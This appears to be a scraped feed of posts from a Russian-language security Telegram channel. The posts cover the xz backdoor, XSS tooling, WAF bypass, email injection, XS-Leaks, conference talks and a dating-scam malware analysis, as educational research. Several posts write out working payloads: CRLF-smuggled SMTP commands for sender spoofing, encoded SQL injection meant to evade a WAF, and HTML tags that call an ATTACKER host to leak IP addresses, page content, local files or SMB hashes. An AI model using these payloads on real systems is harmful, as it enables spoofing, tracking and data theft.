Внутри упоминаются:
// Время чтения: ~7 минут
@HaHacking
Please open Telegram to view this post
VIEW IN TELEGRAM
❤13 3 3
Бэкдор в утилите
xz (CVE-2024-3094) – одна из самых громких новостей последних дней в сфере безопасности;
5.6.0 / 5.6.1sshd[
[
‟backdoor in upstream xz/liblzma leading to ssh server compromise”
Andres Freund, разработчик из Microsoft, сообщил в рассылке oss-security об обнаружении бэкдора в утилите
xz, который приводит к компрометации сервера SSH;Специалист заметил:
🪲 Ошибкиvalgrind*
🪲 Увеличенное время логина по SSH
🪲 Увеличенное потребление CPU при логине по SSH
💻 А после – что TAR-архивxz, поставляемый через upstream репозиторий, содержал строку build-to-host.m4#L63, которой не было ни в upstream'номbuild-to-host, ни на GitHub;
*К слову, ошибкиvalgrindбыли вызваны таким лэйаутом стека, который бэкдор не предусматривал, причём этот недочёт попытались исправить в версииxz 5.6.1;
Оказалось, что происходит инъекция обфусцированного скрипта, который извлёк другой специалист, Florian Weimer, и его исполнение по окончании конфигурации (при некоторых условиях**);
Деобфусцирвав код, специалисты выяснили, что он:➖ Перехватывает выполнение➖ Заменяетcrc32_resolve()/crc64_resolve(), которые резолвятся при запускеsshd, на другой код, вызывающий_get_cpuid()➖ Производит проверки среды окружения➖ Парсит таблицы символов в памяти (основная причина замедления)➖ Устанавливает хук в динамический линковщик, ожидая резолваRSA_public_decrypt@...pltи заменяя его значение для указания на другой код бэкдора➖ Вызывает вредоносный код при логине по SSH с помощью ключа + продолжает нормальную аутентификацию
**Замеченные условия эксплуатации:
gdb, rr, ...)x86-64 linuxgcc + gnu linkerTERMLD_BIND_NOT != 1argv[0] = /usr/sbin/sshdLD_DEBUG, LD_PROFILELANGyolAbejyiejuvnup != Evjtgvsh5okmkAvj[
2022] Путь ко внедрению бэкдора начался приблизительно 2 года назад, когда основного разработчика, Lasse Collin, стали обвинять в медленном прогрессе. Пользователь Jigar Kumar настаивал на том, что xz срочно нужен новый мейнтейнер, ведь проект простаивает;[
2022] Lasse Collin признался незнакомцу, что находится в трудном положении: ментальные проблемы, нехватка рук и ресурсов не дают ему и, следовательно, xz двигаться вперёд с требуемой скоростью, но в проект вносит вклад некий Jia Tan, который, возможно, получит более значимую роль в проекте;[
‟Re: [xz-devel] XZ for Java”
[
2023] Jia Tan становится основным контактом вместо Lasse Collin в oss-fuzz – фаззере open source проектов от Google. Он коммитит инфраструктуру, которая будет использована в эскплойте в 2024 году. Автором числится некий Hans Jansen, который, судя по всему, был создан сугубо для этого коммита. Jia Tan создаёт пулл реквест в oss-fuzz, настаивая на отключении некоторых проверок, обуславливая это необходимостью xz в поддержке IFUNC;[
2024] Jia Tan изменяет ссылку на проект в oss-fuzz с tukaani.org/xz на xz.tukaani.org/xz-utils и коммитит последние штрихи для бэкдора;Эта история – причина вспомнить и подумать о насущном:
@HaHacking
Please open Telegram to view this post
VIEW IN TELEGRAM
2❤19 6 6
whoami на S4UXKERBklist// Время чтения: ~50 минут
@HaHacking
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7 5
// Что с source map? Как учесть фреймворки?
-headless// Чем приводить к адекватному виду?
SAST } Semgrep + правила: XSS / DOM-based XSSDAST } Untrusted Types / PostMessage trackernodeJS скрипт для скана одностраничных веб-приложений внутри Chromium, рекурсивно краулит DOM и запускает event'ы. Возможна настройка сценария логина, прокси, произвольных заголовков, ...;bash скрипт для поиска потенциальных уязвимостей к DOM XSS с использованием LinkFinder;python скрипт для скана сайтов на Reflected / DOM-based XSS с использованием Chrome / PhantomJS;Что имеем в случае Burp Suite:
▪️ DOM Invader⚡️
▪️ Burp Bounty
▪️ DOM XSS Checks – пассивный скан DOM XSS;
▪️ XSS Validator – автоматизация поиска + валидации уязвимости к XSS;
▪️ Burp DOM Scanner – рекурсивный краулер и сканер для одностраничных веб-приложений;
▪️ JavaScript Security – проверки на DOM XSS / проблемы целостности подресурсов (SRI) / по данным Threat Intelligence;
//
@HaHacking
Please open Telegram to view this post
VIEW IN TELEGRAM
4❤17 5🆒1
ZoneID в IPv6 со ссылкой на RFC 6874*Идентификатор зоны – часть IPv6 адреса, начиная со знака%, которая позволяет отличать link-local адреса и содержит идентификатор интерфейса;▪️ Пример адреса сZoneID:[fe80::1ff:fe23:4567:890a%eth2]▪️ Тоже пример адреса сZoneID:[::1%slonser]
@HaHacking
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10 4🆒2
Манипуляция
Content-Type для эксплуатации некорректного парсинга и, следовательно, для обхода WAF, внедрения полезной нагрузки для XSS и проведения CSRF;Базовый пример идеи из репозитория:
Content-Type:application/x-www-form-urlencoded
Body:q=' union select '1➡️ App:' union select 1'➡️ WAF:' union select 1'
Content-Type:application/json
Body:{"q":"' \u0075nion \u0073elect '1"}➡️ App:' union select 1'➡️ WAF:' union select 1'
Content-Type:application/x-www-form-urlencoded;/json
Body:{"q":"' \u0075nion \u0073elect '1"}➡️ App:' union select 1'➡️ WAF:{"q":"' \u0075nion \u0073elect '1"}
Content-Type, которые могут быть использованы для внедрения полезной нагрузки для эксплуатации XSS;Content-Type, которые могут быть использованы для cross-origin запросов в зависимости от браузера;// Подобное от PortSwigger: XSS/Cheat-Sheet#Prototype Pollution
@HaHacking
Please open Telegram to view this post
VIEW IN TELEGRAM
3 10❤6🆒2
Свершилось: появляется программа докладов киберфестиваля Positive Hack Days 2!
Доклад о том, как старые неразрешённые вопросы реализации и клеймо "легаси" повлияли на уязвимость современной электронной почты к инъекциям. Разберём особенности работы почты и основных почтовых протоколов, рассмотрим виды инъекций в почтовую функциональность и вспомним громкие новости о возможности имперсонации, выявленной в крупных почтовых сервисах.
Вопрос защищённости почты остаётся актуальным в связи с повсеместным её использованием в современном мире. И всё же в данном вопросе на руку атакующим играют многие факторы, включая неразрешённые вопросы реализации почтовых элементов, проблему несогласованности между отдельными участниками сферы, а также незаинтересованность новых поколений специалистов в изучении "легаси";
Потому расскажем об устройстве электронной почты, об особенностях, следующих из её устройства, и об уязвимостях, которые вытекают из этих особенностей
➡️ Надумаете прийти – обязательно берите с собой хорошее настроение, ничего более не потребуется; Всё, что нужно знать, Вы узнаете в ходе доклада!💓
OFF] Антон Лопаницын, Passleak @webpwnOFF] Вадим Шелест, Wildberries @purple_medvedDEF] Олег Скулкин, BI.ZONE Threat IntelligenceOFF] Павел Сорокин, Singleton Security @naryl_secOFF] Андрей Матвеенко, МТС RED @bh_catOFF] Пётр Уваров, VKOFF] Виталий Болоховцев, СберАвтоOFF] Михаил Жмайло, Центр инноваций МТС Future Crew @RedTeambro@HaHacking
Please open Telegram to view this post
VIEW IN TELEGRAM
❤18 4🆒2
🧩 ‟Email Attacks” (@slonser_notes🐘 )⚡️
🧩 E-mail Injection
🧩 qwqoro/Mail-Injection [💻 /💻 /🐍 ]
🧩 HaHacking_Вам-письмо.pdf
🧩 qwqoro/Mail-Injection/slides-PHDays.pdf
➖ Hacktricks: Email Injections
➖ OWASP: Testing for IMAP/SMTP Injection
➖ VK9 SEC: SMTP Injection Attack
➖ SMTP Smuggling: Блог
➖ SMTP Smuggling: Сайт
➖ SMTP Smuggling: Доклад 37C3
➖ DEFCON: SpamChannel, Spoofing Emails from 2M+ domains
Ну а киберфестиваль PHD2 продолжается, желаю всем приятного и полезного времяпрепровождения!
@HaHacking
Please open Telegram to view this post
VIEW IN TELEGRAM
❤15 3🆒2 2
ru/en](@hahacking
Уязвимость современной электронной почты к инъекциям;
Поиск и эксплуатация уязвимостей в системах обучения хакеров;
Создание архитектуры и администрирование инфраструктуры для проведения пентестов в формате red teaming, инструменты автоматизации malware development и развертывание атакующей инфраструктуры;
О важности определения верного места для полезной нагрузки, о предотвращении множества детектов антивирусом и о том, как атакующему оставаться скрытым от глаз защитных средств;
Риски безопасности биометрических считывателей;
...
История о самой сложной цепочке атак и шпионском ПО, которые когда-либо были обнаружены специалистами «Лаборатории Касперского»;
Мир управления зависимостями и безопасности открытого программного обеспечения;
...
Спасибо организаторам за организацию площадки, а докладчикам – за их труд и ценный вклад в сообщество!
@HaHacking
Please open Telegram to view this post
VIEW IN TELEGRAM
❤21 7🆒1
Gmail: smtp.gmail.com
Outlook: smtp-mail.outlook.com
Yandex: smtp.yandex.ru
Mail.Ru: smtp.mail.ru
...
SSL port: 465
TLS port: 587
From: EMAIL
From: <EMAIL>
From: "NAME" <EMAIL>
From: <EMAIL> (COMMENT)
From: GROUP: EMAIL, EMAIL
From: GROUP: <EMAIL>
Sender: EMAIL
email]addressparser, email-addresses]System.Net.Mail]net/mail]...
attacker@[testText\r\nRSET\r\nMAIL FROM: <spoofed@example.org>\r\nRCPT TO: <victim@example.org>\r\nDATA\r\nFrom: spoofed@example.org\r\n\r\nText\r\n.\r\nQUIT\r\n]
"Spoofed"
<attacker@outlook.com>: spoofed@outlook.com
<spoofed@gmail.com> "spoofed" <attacker@gmail.com>
Attacker
<spoofed@gmail.com>:<attacker@gmail.com>
": <attacker@gmail.com> "<spoofed@gmail.com>"
CRLF (\r\n) для внедрения SMTP команд❗️ Имперсонация➡️ (в данном случае) Подделка адреса электронной почты отправителя; Обеспечивает кратное повышение легитимности фишинговых писем в глазах атакуемых
@HaHacking
Please open Telegram to view this post
VIEW IN TELEGRAM
// Чек-лист:
✅ Пережила выступление, да ещё и в самодельном мерче (нарисовано руками краской для ткани, да)!🔡
[🔗 материалы тут ]✅ Посетила множество крутых докладов (ещё раз спасибо организаторам за организацию, а докладчикам – за их труд и ценный вклад в сообщество!)
[🔗 записи докладов тут ]❌ Обрела новые знакомства, но увиделась не со всеми, с кем хотела увидеться☹️ (@castercanal, очень ждём в следующий раз!)
➖ отдельное, особенное спасибо @slonser_notes, мне было приятно работать вместе с тобой! ты крутой!➖ владельцам каналов: @poxek, @nxblog, @SidneyJobChannel, @bh_cat, @pwnai, @wr3dmast3rvs, @hackthishit, @giftfromtherift, ...➖ Алексею, Андрею и Петру из VK➖ моим сокомандникам из ШкИБ Яндекса '23➖ всем тем, кто был на спикер-пати, на Похек Use After Party и/или на прочих наших посиделках➖ всем тем, кто слушал наш доклад / поддерживал нас / задавал вопросы / подходил пообщаться➖ ...
Была рада познакомиться лично, увидеться и пообщаться со всеми вами!
@HaHacking
Please open Telegram to view this post
VIEW IN TELEGRAM
❤21 7💔1🆒1
//
Не секрет, что с каждым годом проблема одиночества становится всё острее и критичнее, причём настолько, что можно говорить о настоящей эпидемии и это, к сожалению, даже не станет преувеличением. Современное решение – интернет-знакомства, но где технологии – там и новые способы атаковать. Жаль, но злоумышленники обязательно воспользуются любой технической возможностью и сугубо человеческой уязвимостью для достижения своей цели. Чтобы взглянуть на ситуацию поближе, я создала Никиту;
Никите в приложении пришло следующее сообщение:
💬: Привет) Впервые здесь и ещё не знаю что да как, давай пообщаемся в телеграме мой телеграм ****
// Время чтения: ~40 минут
@HaHacking
Please open Telegram to view this post
VIEW IN TELEGRAM
17❤15 8🆒2 2
📍 Из чат-бота для знакомств❓ Веб-приложение, "Драматический театр"❗️ Фишинг с кражей платёжной информации
Обзор интерфейса сайта, который внушает пользователю иллюзию легитимности, и функциональности, которая обеспечивает сбор платёжной информации атакуемого;
// Тут же был обнаружен сюрприз – интерфейс по пути
/generate, в котором любезно оставлена инструкция мошеннической схемы Извлечение из мобильного приложения, которое было создано с помощью Tasker, XML файла с данными и его импорт в Tasker в качестве проекта для комфортного изучения функциональности;📍 Из приложения для знакомств❓ Мобильное приложение, "Знакомства 18+"❗️ Стилер банковских SMS с элементами RAT и вымогательства
Моё лучшее предположение, исходя из собранных данных, – что мне на анализ попался представитель CraxsRAT;📍 Из чат-бота для знакомств❓ Мобильное приложение, "Стриминговый сервис"❗️ RAT, удалённое управление заражённым устройством
CraxsRAT представляет из себя наиболее свежего наследника CypherRAT, SpyNote и SpyMax. Он вобрал в себя многообразие функций, включая, например:
// Читать полностью...
@HaHacking
Please open Telegram to view this post
VIEW IN TELEGRAM
7❤21 7🆒3 2
Внутреннее устройство FreeIPA и характерные уязвимости;
Нестандартные методы сохранения вредоносного ПО с помощью модификаций реестра и подмены DLL в Windows Internet Explorer, Win32 API Cryptography, Windows Troubleshooting, Microsoft Teams (исправлено в 2024 году) и Process Hacker 2 (исправлено в v3);
Уязвимости модемов Telit, позволяющие удаленно выполнить произвольный код, обход проверки цифровой подписи, активация Over The Air Provisioning (OTAP) и установка на модем собственного мидлета с привилегиями производителя;
Анализ системы offline‑оплаты, метод удаленной компрометации мобильного терминала (посредством протокола Bluetooth) и перехват данных платежных карт пользователей;
Баги, найденные в программах вознаграждения у вендоров, основная сфера деятельности которых — e‑grocery;
Как небольшие ошибки могут привести к критическим для бизнеса угрозам;
Разработчики все чаще стали оставлять открытые source maps в своих веб‑приложениях. Благодаря этому любой пользователь может просмотреть исходный код в его первозданном виде. Что же могло пойти не так?
‟Безопасность мобильных приложений: что нового в 2024 году?”
Наиболее значимые уязвимости и новости в мобильной безопасности: новые векторы атак, классные баги и ошибки, найденные в приложениях за последние полгода;
‟тRAGедия LLM. Эксплуатируем бэкдоры в базе знаний RAG”
Архитектура RAG в LLM, основные векторы атак через внедрение вредоносного документа и способ их оптимизации;
О звонках спамеров после посещения сайта, о расшифровке BitLocker с помощью логического анализатора, и о том, как получить RCE на кассе самообслуживания, просканировав пару штрихкодов;
...
>
И, конечно, спасибо организаторам и участникам OFFZONE за то, что он был таким!
@HaHacking
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10 10 5🎃2💔1
[ ТЕМЫ ]: Взлом DTP / Побег в другую сеть VLAN / Пентест канального уровня сети / Пентест Ethernet / Пентест сетей Cisco / Защита сетей от спуфинг-атак / Защита сетевого оборудования на примере Cisco IOS / Пентест MikroTik / Защита MikroTik / Использование провайдерских протоколов для пивотинга / Использование виртуального MikroTik для постэксплуатации Windows / Закаляем Kali Linux и не шумим в сети / Пентест сетей с наименьшим ущербом;
🧩 casterbyte/NetworkNightmare — Mind map по атакам на сетевые протоколы;
Traffic Hijacking / MiTM Attacks / Dynamic IGP Routing / Configuration Exfiltration / DoS / NAC/802.1X Bypassing / GRE Pivoting / Cisco EEM for hiding user / Authentication Cracking / Information Gathering / Cisco Passwords / VLAN Bypassing;
🧩 casterbyte/MITMonster — Cheat sheet по MITM-атакам;▪️ [L1] Croc-in-the-middle (@s0i37_channel)▪️ [L2] ARP Cache Poisoning, LLMNR/NBT-NS/mDNS Poisoning, STP Root Spoofing, DHCPv4 Spoofing, DHCPv6 Spoofing;▪️ [L3] Evil Twin against Dynamic Routing, FHRP Spoofing;
🧩 “Курс молодого бойца” (NetSkills)
[Cisco Packet Tracer] Простейшая сеть / Коммутатор / Основы Cisco IOS / VLAN / STP / EtherChannel / L3 коммутатор / Маршрутизатор / Статическая маршрутизация / DHCP / NAT / OSPF / EIGRP / Access-List / Cisco ASA / DMZ / VPN / Syslog, NTP / AAA / TFTP / WiFi;
🧩 Серия статей “СДСМ” (LinkMeUp)
Коммутация / Статическая маршрутизация / STP / NAT и ACL / Динамическая маршрутизация / VPN / BGP и IP SLA / IBGP / Мультикаст / Базовый MPLS / MPLS L3VPN / MPLS L2VPN / MPLS EVPN / EVPN Multihoming / MPLS Traffic Engineering / Путь пакета / QoS / ECMP / Балансировка в датацентрах / Сети современных датацентров / Чипы и буферы;
🧩 Материалы Сетевой академии Netacad (Cisco)
Digital Essentials / Networking / Cybersecurity / Programmable Infrastructure / Packet Tracer; [CCNA,CCNP] [#IoT]
@HaHacking
Please open Telegram to view this post
VIEW IN TELEGRAM
❤8🆒5 3🎃1 1
html5sec.org/test/#<1...149> ]Для каждого из почти 150 приведённых векторов XSS атак существует демо-стенд, где можно отредактировать полезную нагрузку
iframe'ов с различными DTD (HTML5, HTML4, XHTML);html5sec.org/test.<ext> ]Примеры файлов, содержащих полезную нагрузку для вызова
alert(1), со следующими расширениями:asf, avi, class, css, dtd, eml, evt, gif, hlp, hta, htc, html, jar, js, json, mpeg, pdf, sct, noscript, swf, vbs, vml, wbxml, xbl, xdr, xml, xsl, xxe, zip
Может быть полезен как памятка для составления полезной нагрузки для эксплуатации возможности внедрения HTML кода: для реализации OOB запросов и эксфильтрации данных;
Или как чеклист для проверки, как там поживает Ваша анонимность, ведь именно по такому принципу работают, например, пиксели-трекеры в электронных письмах
...
<img dynsrc="https://leaking.via/img-dynsrc">
<img lowsrc="https://leaking.via/img-lowsrc">
<video controls><source src="https://leaking.via/video-source-src" type="video/mp4"></video>
<style>@import url(https://leaking.via/css-import-url);</style>
<noscript version="1.1" xmlns="http://www.w3.org/2000/noscript"><rect cursor="url(https://leaking.via/noscript-cursor),auto" /></noscript>
<xml src="https://leaking.via/xml-src" id="xml"></xml>
<math xlink:href="https://leaking.via/mathml-math">CLICKME</math>
...
➖ [Chrome] Leak user html content using Dangling Markup injection when http upgrade to https▪️ ЧТО:<img src="http://ATTACKER/?q=▪️ КОГДА:HTTP➡️ HTTPSдляhttp://ATTACKER▪️ ИТОГ: утечка содержимого страницы➖ [Proton] User IP address leaked on email open▪️ ЧТО:<noscript><style>circle { background-image: url(https://ATTACKER/200); }</style><circle></circle></noscript>▪️ КОГДА: при открытии письма▪️ ИТОГ: утечкаIPадреса➖ [macOS] This man thought opening a txt file is fine, he thought wrong▪️ ЧТО:ℹ️ <!DOCTYPE HTML><html><head></head><body><style>@import{ "file:///net/ATTACKER/a.css"}</style></body></html>ℹ️ <iframedoc src="file:///etc/passwd">▪️ КОГДА: при открытииTXTфайла в TextEdit▪️ ИТОГ: DoS (например, подтянуть/dev/zero), утечкаIPадреса + содержимого локальных файлов (*объединить пейлоады)➖ [MS Outlook] SMB hash hijacking & user tracking▪️ ЧТО:<v:background xmlns_v="urn:schemas-microsoft-com:vml"><br><v:fill src="<strong>its:/ATTACKER/IDontExistNew/foobar</strong>"></v:fill><br></v:background>▪️ КОГДА: при открытии письма▪️ ИТОГ: внешниеSMB/WebDAVзапросы
@HaHacking
Please open Telegram to view this post
VIEW IN TELEGRAM
15❤8🎃8 2
Не отходя от Client-Side атак, захотелось-таки сохранить здесь материалы по XS-Leaks / Cross-Site Leaks; :)
"
SameSite: Lax" cookie затрудняют эксплуатацию XS-Leaks. Но если веб-приложение уязвимо к HTML Injection, можно воспользоваться идеей XS-Leaks для проведения похожей boolean-based атаки (SS-Leaks / Same-Site Leaks) и извлечения информации от лица атакуемого пользователя;<iframe> обновляет своё содержимое вне зависимости от кода ответа<object> НЕ обновляет своё содержимое при 404[ Результаты ]➡️ Есть запрос кATTACKER=/api/v1/leaky?secret=aвернул 404➡️ Нет запроса кATTACKER=/api/v1/leaky?secret=aвернул 200
<object data="/api/v1/leaky?secret=a">
<object data="https://ATTACKER?callback=a">
</object>
</object>
[ Пример CSP➕ Результаты ]Content-Security-Policy: default-src 'self'; img-src *;➡️ Есть запрос кATTACKER=/api/v1/leaky?secret=aвернул 404➡️ Нет запроса кATTACKER=/api/v1/leaky?secret=aвернул 200
<object data="/api/v1/leaky?secret=a">
<img src="https://ATTACKER?callback" loading="lazy">
</object>
[ Результаты ]➡️ Запрос сcallback=0=/api/v1/leaky?secret=aвернул 404➡️ Запрос сcallback=1=/api/v1/leaky?secret=aвернул 200
<object data="/api/v1/leaky?secret=a">
<iframe srcdoc="<img srcset='https://ATTACKER?callback=1 480w, https://ATTACKER?callback=0 800w' sizes='(min-width: 1000px) 800px, (max-width 999px) 480px'>" width="1000px">
</object>
@HaHacking
Please open Telegram to view this post
VIEW IN TELEGRAM
272❤15 7🎃3
Исследуем и раскроем проблемы безопасности умного цветочного горшка через изучение самых разнообразных входных точек вдоль стека OSI, рассмотрев в комплексе интерфейсы, окружающие устройство умного дома и включенные в него:
▪️ Сетевые атаки▪️ Evil Twin через Deauthentication атаку▪️ Имперсонация клиента▪️ Имперсонация сервера обновлений▪️ Уязвимости веб-приложения▪️ Broken Access Control (дефейс, нарушение работы)▪️ Time-based сканирование LAN▪️ Improper Input Validation (чтение / запись в память, кража чувствительных данных)▪️ Управление через расширенный API▪️ Эмуляция нажатий▪️ Mass Assignment (подмена неизменяемых параметров, Open Redirect в мобильном приложении)
// Время чтения: ~20 минут
@HaHacking
Please open Telegram to view this post
VIEW IN TELEGRAM
35❤19 7🎃3